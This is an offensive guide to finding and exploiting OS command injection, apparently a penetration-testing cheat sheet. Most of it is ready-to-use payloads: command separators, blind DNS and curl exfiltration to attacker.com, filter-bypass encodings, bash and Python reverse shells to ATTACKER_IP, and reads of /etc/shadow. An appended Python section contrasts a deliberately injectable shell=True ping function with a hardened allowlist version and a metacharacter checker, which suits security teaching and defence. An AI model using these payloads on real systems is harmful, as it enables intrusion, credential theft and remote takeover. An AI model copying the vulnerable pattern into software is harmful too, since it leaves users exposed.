Step-by-step guide to finding and exploiting OS command injection vulnerabilities using command separators, inline execution, and blind techniques.
Find application features that likely invoke system commands: ping/traceroute utilities, file operations, PDF/image processing, DNS lookups, and any functionality that wraps CLI tools.
ip=127.0.0.1
filename=test.pdf
host=example.com
Inject command separators to append your own commands. Different operating systems use different separators. Test each to determine the OS and which characters are allowed.
127.0.0.1; whoami
127.0.0.1 | id
127.0.0.1 || id
127.0.0.1 & whoami
127.0.0.1 && id
`whoami`
$(id)
If output is not reflected, use time delays or out-of-band techniques to confirm execution. DNS-based exfiltration is reliable when HTTP callbacks are blocked.
127.0.0.1; sleep 10
127.0.0.1 | ping -c 10 127.0.0.1
127.0.0.1; nslookup $(whoami).attacker.com
127.0.0.1; curl http://attacker.com/$(whoami)
If certain characters or commands are blocked, try alternatives: variable expansion, wildcard globbing, encoding, newline injection, and command substitution variations.
127.0.0.1;w"h"oami
127.0.0.1;/b??/w?oami
127.0.0.1;$(printf "\x77\x68\x6f\x61\x6d\x69")
127.0.0.1%0aid
Once command execution is confirmed, attempt to establish a reverse shell for interactive access. Use the Reverse Shell generator to craft OS-appropriate payloads.
; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
| python3 -c 'import socket,subprocess;s=socket.socket();s.connect(("ATTACKER_IP",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
Record the vulnerable parameter, OS type, injection technique, and achievable impact. Command injection typically results in full system compromise, making it a critical finding.
; cat /etc/shadow
; net user administrator
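As an added example (not part of the original cheat sheet), the vulnerable pattern behind a typical ping utility beside its hardened form, plus a triage check for the separators, substitution syntax and %0a newline listed above. The handler functions, SHELL_METACHARS and the hostname pattern are assumptions for illustration, not the site's code.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote

# Shell syntax that the separator, substitution and newline payloads above rely on
# (assumed list; extend it for the shells you actually run).
SHELL_METACHARS = ("\n", "\r", ";", "|", "&", "`", "$(", "${")

# RFC 1123 style hostname: labels of letters, digits and hyphens, no leading hyphen,
# so the value can never be parsed as a ping option either.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)([a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$", re.I)


def ping_vulnerable(ip: str) -> str:
    """The anti-pattern: untrusted input spliced into a command line run by /bin/sh,
    so every separator in the cheat sheet is honoured. Shown only for contrast."""
    return subprocess.run("ping -c 1 " + ip, shell=True,
                          capture_output=True, text=True).stdout


def find_shell_metachars(value: str) -> list[str]:
    """Triage helper for logs or WAF review: metacharacters present after URL-decoding,
    which is what turns the %0a payload back into a real newline."""
    decoded = unquote(value)
    return [m for m in SHELL_METACHARS if m in decoded]


def is_valid_target(value: str) -> bool:
    """Allowlist, not denylist: an IP literal or a hostname, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(value) is not None


def build_ping_argv(target: str) -> list[str]:
    """Hardened form: validate against the allowlist, then build an argv list.
    With no shell involved, ';', '|', '$(' and friends are just bytes in one argument."""
    if not is_valid_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return ["ping", "-c", "1", target]


def ping_hardened(target: str) -> str:
    return subprocess.run(build_ping_argv(target), capture_output=True,
                          text=True, timeout=5).stdout
```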